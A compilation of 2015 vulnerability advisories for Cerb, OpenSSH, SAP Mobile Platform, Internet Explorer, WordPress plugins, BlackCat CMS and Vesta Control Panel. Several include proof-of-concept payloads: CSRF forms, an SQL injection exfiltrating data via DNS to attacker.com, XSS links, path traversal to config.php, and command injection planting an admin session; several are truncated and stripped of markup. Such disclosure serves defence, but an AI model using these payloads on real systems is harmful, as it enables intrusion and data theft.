Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb
platform, which can be exploited to perform Cross-Site Request Forgery attacks
against administrators of vulnerable web application to add administrate
accounts into the system.
The vulnerability exists due to failure of the "/ajax.php" script to properly
verify the source of incoming HTTP request. Taking into consideration that Cerb
is a business-critical application, this security flaw may be quite dangerous
if exploited by malicious attackers.
A simple exploit below will add admin user into the system when a logged-in
victim opens a malicious page with the exploit:
http://[host]/ajax.php; method = "POST">
document.getElementById('btn').click();
---
Solution:
Update to Cerb 7.0.4
More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
---
References:
[1] High-Tech Bridge Advisory HTB23269 -
https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform
for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
---
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-002 13-August-2015
Affected Product: OpenSSH (http://www.openssh.com)
Affected Version: Portable versions = 6.9p1
Vulnerability: Vulnerabilities in PAM Privilege Separation Code
I. Impact
Two vulnerabilities were identified in the PAM privilege separation code. One
of them (III) allows remote attackers who previously achieved remote code
execution within the unprivileged pre-auth sandbox process to perform a
successful authentication as an arbitrary user (e.g. root) and thus impersonate
other users. The only additional prerequisite is any valid (possibly
low-privileged) user account which can be used to login into the system via SSH.
II. Background
OpenSSH implements privilege separation which was introduced with version 5.9.
Privilege separation is a generic approach which splits the code into two
processes: An unprivileged child process and a privileged monitor process. The
unprivileged child does most of the work and in particular processes all the
network data. The monitor process communicates with the unprivileged child
process and performs all the operations which require higher privileges. The
idea of this design is to prevent programming errors in the unprivileged parts
from compromising the whole application and thus prevent a full system
compromise. A good technical overview can be found in the paper
Preventing Privilege Escalation by Niels Provos et al.
(http://www.peter.honeyman.org/u/provos/papers/privsep.pdf).
The unprivileged child process and privileged monitor process communicate via
a socketpair. Several different monitor request and answer types are defined
which can be used to exchange messages between the two processes. The complete
list can be found in the mon_dispatch_proto{15,20} and
mon_dispatch_postauth{15,20} structures defined in monitor.c.
Monitor requests have certain flags assigned which can restrict when and how
requests are accepted by the monitor. E.g. the flag MON_ONCE determines that
a request can only be sent once and is disabled after it was received for the
first time in the monitor. The MON_AUTH flag determines that a request is
related to the authentication process. The complete list of flags can be found
in the monitor.c file as well.
Not all defined requests are permitted in every state of the SSH protocol. In
order to control which requests are permitted, the functions monitor_permit()
and monitor_permit_authentications() are used. The function monitor_permit()
can be used to enable or disable a certain message while the function
monitor_permit_authentications() enables or disables all authentication
related messages which have the MON_AUTH flag set. When a request is received
by the monitor which is currently not allowed the monitor process terminates
by calling the fatal() function.
III. PAM Authentication Bypass in Privilege Separation
When PAM support is enabled in the portable version of OpenSSH, a few additonal
monitor requests are enabled which can be found in the monitor.c file:
#ifdef USE_PAM
{MONITOR_REQ_PAM_START, MON_ONCE, mm_answer_pam_start},
{MONITOR_REQ_PAM_ACCOUNT, 0, mm_answer_pam_account},
{MONITOR_REQ_PAM_INIT_CTX, MON_ISAUTH, mm_answer_pam_init_ctx},
{MONITOR_REQ_PAM_QUERY, MON_ISAUTH, mm_answer_pam_query},
{MONITOR_REQ_PAM_RESPOND, MON_ISAUTH, mm_answer_pam_respond},
{MONITOR_REQ_PAM_FREE_CTX, MON_ONCE|MON_AUTHDECIDE, mm_answer_pam_free_ctx},
#endif
Before any PAM-related monitor requests are sent, the unprivileged child process
sends the MONITOR_REQ_PWNAM request to verify that the username received from
the network represents a valid user. The monitor responds with the corresponding
passwd struct entry if the user exists and additionally caches the username
and passwd struct entry in the current monitor authentication context
(struct Authctxt *authctxt).
PAM authentication then starts with the unprivileged child process sending the
MONITOR_REQ_PAM_START request which tells the monitor to open a new
authentication transaction for the current user by calling the PAM API function
pam_start().
The next PAM-related monitor request sent by the child process is
MONITOR_REQ_PAM_INIT_CTX which initializes [2] the current PAM authentication
context in the monitor.
int
mm_answer_pam_init_ctx(int sock, Buffer *m)
{
debug3(%s, __func__);
authctxt-user = buffer_get_string(m, NULL);[1]
sshpam_ctxt = (sshpam_device.init_ctx)(authctxt); [2
[Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2015-012: SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage 1. Impact on Business - - By exploiting this vulnerability an attacker with access to a vulnerable mobile device would be able to read sensitive information, including encrypted log in credentials, stored in the device, potentially connecting to business applications and accessing or modifying business information Risk Level: High 2.Advisory Information - --- * Public Release Date: 2015-08-12 * Subscriber Notification Date: 2015-08-12 * Last Revised: 2015-08-12 * Security Advisory ID: ONAPSIS-2015-012 * Onapsis SVS ID: ONAPSIS-00149 * CVE: Not Assigned * Researcher: Fernando Russ * Initial Base CVSS v2: 4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N) 3. Vulnerability Information - * Vendor: SAP AG * Affected Components: * SAP Mobile Platform 3.0 SP05 ClientHub * Vulnerability Class: Use of Hard-coded Cryptographic Key (CWE-321) * Remotely Exploitable: No * Locally Exploitable: Yes * Authentication Required: No * Original Advisory: http://www.onapsis.com/research/security-advisories/ 4.Affected Components Description - -- The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is used to securely store data on mobile devices. As described by SAP AG [...] The DataVault APIs provide a secure way to persist and encrypt data on the device. The data vault uses AES-256 symmetric encryption of all its contents. The AES key is computed as a hash of the passcode provided and a ‘salt’ value that can be supplied by the device application developer, or automatically generated through the API [...] 5.Vulnerability Details - The SAP DataVault has a special mechanism to generate a default set of credentials if no password/salt is supplied during the creation of the secure storage. In this mode of operation the password/salt is derived from a combination of fixed values and the VaultID belonging to the secure storage. 6.Solution - --- Implement SAP Security Note 2094830. 7.Report Timeline * 11/07/2014: Onapsis provides vulnerability information to SAP AG. * 11/08/2014: SAP AG confirms having received the information. * 04/08/2015: SAP AG releases SAP security note 2094830 fixing the vulnerability * 08/12/2015: Security Advisory is released. About Onapsis Research Labs - --- Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlXLXZ8ACgkQz3i6WNVBcDXUkACeKV+76wa7IHncrIHFu9GhtJgu 9kYAoLOQN6rGuTkqA4s/ReBA/Uggt6bC =hiVs -END PGP SIGNATURE-
[Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2015-010: SAP Mobile Platform DataVault Keystream Recovery 1. Impact on Business - - By exploiting this vulnerability an attacker with access to a vulnerable mobile device would be able to decrypt credentials and other sensitive information stored in it, potentially being able to connect to other business systems. Risk Level: High 2. Advisory Information - --- * Public Release Date: 2015-08-12 * Subscriber Notification Date: 2015-08-12 * Last Revised: 2015-08-12 * Security Advisory ID: ONAPSIS-2015-010 * Onapsis SVS ID: ONAPSIS-00149 * CVE: Not Assigned * Researcher: Fernando Russ * Initial Base CVSS v2: 5.4 (AV:L/AC:M/Au:N/C:C/I:P/A:N) 3. Vulnerability Information - * Vendor: SAP AG * Affected Components: * SAP Mobile Platform 3.0 SP05 ClientHub * Vulnerability Class: Missing Required Cryptographic Step (CWE-325) * Remotely Exploitable: No * Locally Exploitable: Yes * Authentication Required: No * Original Advisory: https://www.onapsis.com/research/security-advisories/SAP-Mobile-Platform-DataVault-Keystream-Recovery 4. Affected Components Description - -- The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is used to securely store data on mobile devices. As described by SAP AG [...] The DataVault APIs provide a secure way to persist and encrypt data on the device. The data vault uses AES-256 symmetric encryption of all its contents. The AES key is computed as a hash of the passcode provided and a =E2=80=98salt=E2=80=99 value that can be supplied by the device application developer, or automatically generated through the API [...] 5. Vulnerability Details - Due to an incorrect implementation of the cryptografic algorithms and parameters, it is possible to recover the keystream for the encrypted data. As a result, it is possible to recover part of the plaintext corresponding to an encrypted piece of data thus reverting the encryption process of some values inside the DataVault without needing the original secret key. Furthermore, due to the lack of cryptographic integrity mechanisms in the SAP DataVault an attacker recovering this keystream has the possibility of re-encrypting (or modifying in practical terms) with some limitations, some values previously encrypted inside the DataVault. 6. Solution - --- Implement SAP Security Note 2094830. 7. Report Timeline - -- * 11/07/2014: Onapsis provides vulnerability information to SAP AG. * 11/08/2014: SAP AG confirms having received the information. * 04/08/2015: SAP AG releases SAP security note fixing the vulnerability * 08/12/2015: Security Advisory is released. About Onapsis Research Labs - --- Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlXLXUYACgkQz3i6WNVBcDU0lgCfbjB9R8+KN98m2z0lx0OkviFd uaYAmwTpCAaK3YG2EoEWyMYIaVDjr7Hy =SyWj -END PGP SIGNATURE-
[Onapsis Security Advisory 2015-011] SAP Mobile Platform DataVault Predictable encryption passwords for Configuration Values
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2015-011: SAP Mobile Platform DataVault Predictable encryption passwordsfor Configuration Values 1. Impact on Business - - By exploiting this vulnerability an attacker with access to a vulnerable mobile device would be able to decrypt and modify sensitive configuration values used by SAP business applications. Risk Level: High 2. Advisory Information - --- * Public Release Date: 2015-08-12 * Subscriber Notification Date: 2015-08-12 * Last Revised: 2015-08-12 * Security Advisory ID: ONAPSIS-2015-0011 * Onapsis SVS ID: ONAPSIS-00149 * CVE: Not assigned * Researcher: Fernando Russ * Initial Base CVSS v2: 4.7 (AV:L/AC:M/Au:N/C:C/I:N/A:N) 3. Vulnerability Information - * Vendor: SAP AG * Affected Components: * SAP Mobile Platform 3.0 SP05 ClientHub * Vulnerability Class: Use of Hard-coded Cryptographic Key (CWE-321) * Remotely Exploitable: No * Locally Exploitable: Yes * Authentication Required: No * Original Advisory: https://www.onapsis.com/research/security-advisories/SAP-Mobile-Platform-Predictable-Encryption-Password-for-Configuration-Values 4. Affected Components Description - -- The SAP Mobile Platform 3.0 SP5 has an API called DataVault, which is used to securely store data on mobile devices. As described by SAP AG [...] The DataVault APIs provide a secure way to persist and encrypt data on the device. The data vault uses AES-256 symmetric encryption of all its contents. The AES key is computed as a hash of the passcode provided and a ‘salt’ value that can be supplied by the device application developer, or automatically generated through the API [...] 5. Vulnerability Details - The SAP DataVault uses a special password derived from well-known values to encrypt some configuration values like the count of invalid attempts to unlock a secure store. This password is a composition of a value which is available in plaintext form inside the secure store container, and a fixed value. Also, the salt used is fixed. Both values are statically defined by the SAP DataVault implementation, and do not depend neither on the installation nor on the usage of the DataVault. 6. Solution - --- Implement SAP Security Note 2094830. 7. Report Timeline - -- * 11/07/2014: Onapsis provides vulnerability information to SAP AG. * 11/08/2014: SAP AG confirms having received the information. * 04/08/2015: SAP AG releases SAP security note 2094830 fixing the vulnerability * 08/12/2015: Security Advisory is released. About Onapsis Research Labs - --- Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlXLXXEACgkQz3i6WNVBcDXHzgCdFcY7MtChSCFGXIZHI5E2BZFA NbQAoLxIogVIwsqLsp9OsXjdlKzOvOpM =C9yq -END PGP SIGNATURE-
BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/ research(at)bluefrostsecurity.de
BFS-SA-2015-001 12-August-2015
Vendor: Microsoft, http://www.microsoft.com
Affected Products: Internet Explorer
Affected Version: IE 8-11
Vulnerability: CTreeNode::GetCascadedLang Use-After-Free Vulnerability
CVE ID: CVE-2015-2444
I. Impact
If an attacker succeeds in bypassing the Memory Protector and Isolated Heap
protection mechanisms this vulnerability allows the execution of arbitrary
code on vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target must
visit a malicious page or open a malicious file.
II. Vulnerability Details
Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::GetCascadedLang function. The following analysis was
performed on Internet Explorer 11 on Windows 8.1 (x64).
The following HTML page demonstrates the problem:
!DOCTYPE HTML
html
meta http-equiv=X-UA-Compatible content=IE=10 /
script
function Trigger() {
for(i=0; i document.getElementsByTagName(meter).length;
i++) {
document.getElementsByTagName(meter)[i].innerText =
a;
}
}
function reload() {
location.reload();
}
setTimeout(reload(), 1000);
/script
buttonlabelstylelabel{}/styleform
meterlabeloptgroupmeterfieldsetscriptTrigger();/script/meter
select/selectbutton/buttonformform
inputscriptTrigger();/script
formstyleform{-ms-behavior: url(c);}/style/form
/html
With page heap enabled, visiting that page results in the following crash:
(7c0.408): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\SYSTEM32\MSHTML.dll -
eax= ebx=12698fa0 ecx= edx=0100 esi= edi=12696fb8
eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!CreateCoreWebView+0x1e0234:
6fea5a44 81b82803506ffb6f cmp dword ptr [eax+328h],offset
MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50) ds:002b:0328=
0:005 ub
MSHTML!CTreeNode::GetCascadedLang+0x5f:
6fea5a2b 8945f8 mov dword ptr [ebp-8],eax
6fea5a2e 8945f0 mov dword ptr [ebp-10h],eax
6fea5a31 8b4710 mov eax,dword ptr [edi+10h]
6fea5a34 85c0testeax,eax
6fea5a36 740aje MSHTML!CTreeNode::GetCascadedLang+0x76
(6fea5a42)
6fea5a38 f6400c04testbyte ptr [eax+0Ch],4
6fea5a3c 0f859a02jne MSHTML!CTreeNode::GetCascadedLang+0x30f
(6fea5cdc)
6fea5a42 8b07mov eax,dword ptr [edi]
0:005 !heap -p -a edi+10
address 12696fc8 found in
_DPH_HEAP_ROOT @ a961000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize -
VirtAddr VirtSize)
a9646e8: 12696fb8 48 -
12696000 2000
71e694ec verifier!AVrfDebugPageHeapAllocate+0x023c
779057b7 ntdll!RtlDebugAllocateHeap+0x003c
778a77ce ntdll!RtlpAllocateHeap+0x0004665a
77861134 ntdll!RtlAllocateHeap+0x014d
6fa31dd5 MSHTML!CLabelElement::CreateElement+0x0015
6f8a5b4d MSHTML!CreateElement+0x0084
6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x0078
6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x003d
6f91d3a3
MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x0026
6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x00a5
6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x028c
6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x012c
6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x0131
6f91a377 MSHTML!CHtmPost::ProcessTokens+0x06af
6f914952 MSHTML!CHtmPost::Exec+0x01e4
6f991118 MSHTML!CHtmPost::Run+0x003d
6f99107e MSHTML!PostManExecute+0x0061
6f9994a2 MSHTML!PostManResume+0x007b
6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x003e
6f7fd865 MSHTML!GlobalWndOnMethodCall+0x016d
6f7fd18a MSHTML!GlobalWndProc+0x02e5
75a68e71 user32!_InternalCallWinProc+0x002b
75a690d1 user32!UserCallWinProcCheckWow+0x018e
75a6a66f user32!DispatchMessageWorker+0x0208
75a6a6e0 user32!DispatchMessageW+0x0010
710600d8 IEFRAME!CTabWindow
SQL Injection in Count Per Day WordPress Plugin
Advisory ID: HTB23267 Product: Count Per Day WordPress plugin Vendor: Tom Braider Vulnerable Version(s): 3.4 and probably prior Tested Version: 3.4 Advisory Publication: July 1, 2015 [without technical details] Vendor Notification: July 1, 2015 Vendor Patch: July 1, 2015 Public Disclosure: July 22, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-5533 Risk Level: Medium CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered SQL Injection vulnerability in Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in application’s database, gain control of potentially sensitive information and compromise the entire website. The vulnerability is caused by insufficient filtration of input data passed via the cpd_keep_month HTTP POST parameter to /wp-admin/options-general.php script. A remote user with administrative privileges can manipulate SQL queries, inject and execute arbitrary SQL commands within the application’s database. This vulnerability can be exploited by anonymous attacker via CSRF vector, since the web application does not check origin of HTTP requests. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of .attacker.com (a domain name, DNS server of which is controlled by the attacker): form action = http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-options.phptab=tools; method = POST name=f1 input type=hidden name=collect value=Collect old data input type=hidden name=do value=cpd_collect input type=hidden name=cpd_keep_month value=6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- 2 input value=go type=submit / /formscriptdocument.f1.submit();/script --- Solution: Update to Count Per Day 3.4.1 More Information: https://wordpress.org/plugins/count-per-day/changelog/ https://plugins.trac.wordpress.org/changeset/1190683/count-per-day --- References: [1] High-Tech Bridge Advisory HTB23267 - https://www.htbridge.com/advisory/HTB23267 - SQL Injection in Count Per Day WordPress Plugin. [2] Count Per Day WordPress plugin - https://wordpress.org/plugins/count-per-day/ - A statistics plugin which displays Visit Counter, shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple XSS Vulnerabilities in Paid Memberships Pro WordPress Plugin
Advisory ID: HTB23264 Product: Paid Memberships Pro WordPress plugin Vendor: Stranger Studios Vulnerable Version(s): 1.8.4.2 and probably prior Tested Version: 1.8.4.2 Advisory Publication: July 1, 2015 [without technical details] Vendor Notification: July 1, 2015 Vendor Patch: July 8, 2015 Public Disclosure: July 22, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-5532 Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Paid Memberships Pro WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against website administrators. 1) Cross-Site Scripting (XSS) in Paid Memberships Pro WordPress plugin: CVE-2015-5532 1.1 Input passed via s HTTP GET parameter to /wp-admin/admin.php (when page is set to pmpro-membershiplevels) is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the alert() JavaScript function to display ImmuniWeb word: http://[host]/wp-admin/admin.php?page=pmpro-membershiplevelss=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.2 Input passed via edit HTTP GET parameter to /wp-admin/admin.php (when page is set to pmpro-membershiplevels) is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the alert() JavaScript function to display ImmuniWeb word: http://[host]/wp-admin/admin.php?page=pmpro-membershiplevelsedit=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.3 Input passed via s HTTP GET parameter to /wp-admin/admin.php (when page is set to pmpro-memberslist) is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the alert() JavaScript function to display ImmuniWeb word: http://[host]/wp-admin/admin.php?lpage=pmpro-memberslists=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E 1.4 Input passed via s HTTP GET parameter to /wp-admin/admin.php (when page is set to pmpro-orders) is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the alert() JavaScript function to display ImmuniWeb word: http://[host]/wp-admin/admin.php?filter=allstart-month=1start-day=1start-year=2015end-month=6end-day=22end-year=2015predefined-date=This+Monthl=1statuspage=pmpro-orderss=%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E --- Solution: Update to Paid Memberships Pro 1.8.4.3 More Information: http://www.paidmembershipspro.com/2015/07/pmpro-updates-1-8-4-3-and-1-8-4-4/ https://github.com/strangerstudios/paid-memberships-pro/commit/add03e3ed90e9163e5a46e20e6c371a87ff5a677 --- References: [1] High-Tech Bridge Advisory HTB23264 - https://www.htbridge.com/advisory/HTB23264 - Multiple XSS Vulnerabilities in Paid Memberships Pro WordPress Plugin. [2] Paid Memberships Pro WordPress plugin - http://www.strangerstudios.com/ - Paid Memberships Pro is the community solution for adding paid memberships to your WordPress site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any
Path Traversal in BlackCat CMS
Advisory ID: HTB23263 Product: BlackCat CMS Vendor: Black Cat Development Vulnerable Version(s): 1.1.1 and probably prior Tested Version: 1.1.1 Advisory Publication: June 10, 2015 [without technical details] Vendor Notification: June 10, 2015 Vendor Patch: June 24, 2015 Public Disclosure: July 1, 2015 Vulnerability Type: Path Traversal [CWE-22] CVE Reference: CVE-2015-5079 Risk Level: High CVSSv2 Base Score: 7.8 (AV:N/AC:L/Au:N/C:С/I:N/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in BlackCat CMS, which can be exploited to view contents of arbitrary files on the local system. An attacker might be able to obtain potentially sensitive or system information, and even compromise the vulnerable system. The vulnerability exists due to improper validation of file path in dl HTTP GET parameter, when reading local files using /modules/blackcat/widgets/logs.php script. A remote unauthenticated attacker can download arbitrary files from the vulnerable system using directory traversal sequences (../). A simple exploit below allows download of config.php file: http://host/modules/blackcat/widgets/logs.php?dl=/../config.php --- Solution: Update to BlackCat CMS 1.1.2 --- References: [1] High-Tech Bridge Advisory HTB23263 - https://www.htbridge.com/advisory/HTB23263 - Path Traversal in BlackCat CMS. [2] BlackCat CMS - http://blackcat-cms.org/ - OpenSource Content Management System. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
OS Command Injection in Vesta Control Panel
Advisory ID: HTB23261 Product: Vesta Control Panel Vendor: http://vestacp.com Vulnerable Version(s): 0.9.8 and probably prior Tested Version: 0.9.8 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Patch: June 3, 2015 Public Disclosure: June 17, 2015 Vulnerability Type: OS Command Injection [CWE-78] CVE Reference: CVE-2015-4117 Risk Level: Critical CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system. The vulnerability exists due to insufficient filtration of user-input passed via the backup HTTP GET parameter to /list/backup/index.php before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel admin account. Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system. A simple exploit below will create a PHP session file in /tmp/ directory with administrative access to Vesta Control Panel: https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20 echo 'V0VCX1NZU1RFTXxzOjc6ImFwYWNoZTIiO1dFQl9SR1JPVVBTfHM6ODoid3d3LWRhdGEiO1dFQl9QT1JUfHM6NDoiODA4MCI7V0VCX1NTTHxzOjc6Im1vZF9zc2wiO1dFQl9TU0xfUE9SVHxzOjQ6Ijg0NDMiO1BST1hZX1NZU1RFTXxzOjU6Im5naW54IjtQUk9YWV9QT1JUfHM6MjoiODAiO1BST1hZX1NTTF9QT1JUfHM6MzoiNDQzIjtGVFBfU1lTVEVNfHM6NjoidnNmdHBkIjtNQUlMX1NZU1RFTXxzOjU6ImV4aW00IjtJTUFQX1NZU1RFTXxzOjc6ImRvdmVjb3QiO0FOVElWSVJVU19TWVNURU18czowOiIiO0FOVElTUEFNX1NZU1RFTXxzOjA6IiI7REJfU1lTVEVNfHM6NToibXlzcWwiO0ROU19TWVNURU18czo1OiJiaW5kOSI7U1RBVFNfU1lTVEVNfHM6MTc6IndlYmFsaXplcixhd3N0YXRzIjtCQUNLVVBfU1lTVEVNfHM6NToibG9jYWwiO0NST05fU1lTVEVNfHM6NDoiY3JvbiI7RElTS19RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU18czo4OiJpcHRhYmxlcyI7RklSRVdBTExfRVhURU5TSU9OfHM6ODoiZmFpbDJiYW4iO1JFUE9TSVRPUll8czo1OiJjbW1udCI7VkVSU0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsYW5ndWFnZXxzOjI6ImVuIjt1c2VyfHM6NToiYWRtaW4iO2JhY2t8czoxMToiL2xpc3QvdXNlci8iOw==' | base64 --decode /tmp/sess_12345%20||%20echo%20\ After successful creation of PHP session file, the following cookie can be used to gain administrative access: GET / HTTP/1.1 Cookie: 